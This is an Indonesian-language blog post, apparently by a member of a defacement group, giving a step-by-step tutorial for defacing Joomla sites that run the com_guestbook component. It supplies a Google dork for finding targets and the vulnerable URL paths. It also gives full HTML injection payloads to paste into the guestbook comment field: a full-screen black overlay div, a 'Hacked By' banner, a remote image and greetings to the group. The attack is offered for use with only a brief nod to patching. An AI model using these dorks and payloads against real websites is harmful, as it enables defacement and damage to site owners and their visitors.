Deface Com_Guestbook Arbitrary Code Injection

Friday, September 16, 2016

kali ini saya Yukinoshita 47 ingin sharing poc hasil riset nya sang master yaitu E7B_404 dia menggunakan script jahat saya buat bahan riset nya :v


oke kali ini deface web Joomla yang menggunakan component GuestBook

udah selesai kan coli nya :D oke langsung aja kita ke tahap selanjut nya :v



Dork nya : inurl:option=com_guestbook

Exploitation : situs.co.li/[path-CMS]/index.php?option=com_guestbook
                        situs.co.li/index.php?option=com_guestbook

selanjutnya kalian dorking dulu :v 

udah nemu ? oke pertama2

Klik Add Comment

isi kolom Your Name, Your Email, URL, Title sembarangan aja trus pada kolom komentar nya di isi script jahat + script depesan kalian

Script Jahat Saya [ Jauh Lebih Keren dari JS Overlay :p ]

<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; height: 2698px; background-color: black; layer-background-color: black"><center> 

Script Depesan Saya :

<br><b><font face="arial" color="red" size="5">Hacked By Yukinoshita 47</font></h2><br>
<br><img src="http://arixsakuraxravaine.weebly.com/uploads/1/6/1/0/16109400/7559891_orig.jpg" height=200 width=400>
<br><br><b><font face="arial" color="red" size="5">"No Army Can Stop Idea"</font></h2><br>
<br><b><font face="arial" color="red" size="5">Greetz :  _Tuan2Fay_ - Snooze - TM_404 - E7B_404 - XM404RS! - Mr.Spongebob - CyberGhost.17 - Lyonc - EvilClown - LuckNut - Sector V2 - MR.Blank007 - DarkTerrorizt
And All Member of Garuda Security Hacker</font></h2><br>  

jadi nya 


<div align=center><DIV id=layer1 style="border-right: #000000 1px; border-top: #000000 1px; z-index: 1; left: 0px; border-left: black 1px; width: 2350px; border-bottom: black 1px; position: absolute; top: 0px; height: 2698px; background-color: black; layer-background-color: black"><center>
<br><b><font face="arial" color="red" size="5">Hacked By Yukinoshita 47</font></h2><br>
<br><img src="http://arixsakuraxravaine.weebly.com/uploads/1/6/1/0/16109400/7559891_orig.jpg" height=200 width=400>
<br><br><b><font face="arial" color="red" size="5">"No Army Can Stop Idea"</font></h2><br>
<br><b><font face="arial" color="red" size="5">Greetz :  _Tuan2Fay_ - Snooze - TM_404 - E7B_404 - XM404RS! - Mr.Spongebob - CyberGhost.17 - Lyonc - EvilClown - LuckNut - Sector V2 - MR.Blank007 - DarkTerrorizt
And All Member of Garuda Security Hacker</font></h2><br> 

seperti gambar dibawah ini


Jika Sudah Oke Klik Save Comment seperti gambar di bawah ini :


Jika muncul seperti ini berarti berhasil cukk yeayyy :D 


hahaha gampang sekali kan :D

bagi pengguna joomla component guestbook ini segera update ke versi yang paling baru ya biar gak kena tempel :v



Greets : | _Tuan2Fay_ | Yukinoshita 47 | TM_404 | Snooze | Lyonc | E7B_404 | DarkTerrorizt | ./Zero*Angel | 5iNON!MOU23 | OutrageousEngkus | Mr.XM404RS! | ./R15_UTD | EvilClown | 34D_SL33P | Sector V.2 | Mr.Spongebob | CyberGhost.17 | Heruu Dot ID | And All Member of Garuda Security Hacker

Saya orang nya sederhana dan biasa saja gak lebih

Related Post

Next
Previous
Click here for Comments

3 comments:

avatar

How beautifully all the feelings have been conveyed through writing.
click now